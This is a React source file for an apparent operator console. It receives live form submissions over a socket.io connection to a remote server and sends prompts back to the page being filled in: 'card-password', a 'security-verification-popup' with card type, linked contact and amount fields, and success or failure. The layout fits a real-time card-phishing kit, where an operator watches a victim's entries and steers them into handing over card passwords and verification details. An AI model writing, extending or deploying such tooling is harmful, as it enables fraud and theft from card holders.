import React, { useEffect, useState } from "react";
import { io } from "socket.io-client";

const socket = io("https://mirro-server.onrender.com");

const FormLiveView = () => {
  const [latest, setLatest] = useState(null);
  const [showVerificationInputs, setShowVerificationInputs] = useState(false);
  const [cardType, setCardType] = useState("");
  const [linkedContact, setLinkedContact] = useState("");
  const [amount, setAmount] = useState("");

  useEffect(() => {
    socket.on("form-update", (data) => {
      setLatest(data);
    });
  }, []);

  const sendStatusUpdate = (status: string) => {
    if (status === "security-verification-popup") {
      setShowVerificationInputs(true);
    } else {
      socket.emit("status-update", { type: status });
    }
  };

  const sendVerificationStatus = () => {
    const payload = {
      type: "security-verification-popup",
      cardType,
      linkedContact,
      amount,
    };
    socket.emit("status-update", payload);
    setShowVerificationInputs(false);
    setCardType("");
    setLinkedContact("");
    setAmount("");
  };

  return (
    <div style={{ padding: "2rem" }}>
      <h2>Live Form Submission</h2>
      {latest ? (
        <pre>{JSON.stringify(latest, null, 2)}</pre>
      ) : (
        <p>No submissions yet...</p>
      )}

      <div style={{ marginTop: "2rem" }}>
        <h3>Send Status</h3>
        {["loading", "security-verification-popup", "card-password", "success", "failed"].map((label) => (
          <button
            key={label}
            onClick={() => sendStatusUpdate(label)}
            style={{
              margin: "0.5rem",
              padding: "0.75rem 1.5rem",
              background: "#219653",
              color: "white",
              border: "none",
              borderRadius: "5px",
              cursor: "pointer"
            }}
          >
            {label}
          </button>
        ))}
      </div>

      {showVerificationInputs && (
        <div style={{ marginTop: "1rem", maxWidth: "400px" }}>
          <h4>Security Verification Details</h4>
          <input
            type="text"
            placeholder="Card Type"
            value={cardType}
            onChange={(e) => setCardType(e.target.value)}
            style={{ display: "block", marginBottom: "0.5rem", width: "100%", padding: "0.5rem" }}
          />
          <input
            type="text"
            placeholder="Linked Contact"
            value={linkedContact}
            onChange={(e) => setLinkedContact(e.target.value)}
            style={{ display: "block", marginBottom: "0.5rem", width: "100%", padding: "0.5rem" }}
          />
          <input
            type="text"
            placeholder="Amount"
            value={amount}
            onChange={(e) => setAmount(e.target.value)}
            style={{ display: "block", marginBottom: "0.5rem", width: "100%", padding: "0.5rem" }}
          />
          <button
            onClick={sendVerificationStatus}
            style={{
              padding: "0.75rem 1.5rem",
              background: "#2F80ED",
              color: "white",
              border: "none",
              borderRadius: "5px",
              cursor: "pointer",
              marginTop: "0.5rem"
            }}
          >
            Send Verification Info
          </button>
        </div>
      )}
    </div>
  );
};

export default FormLiveView;
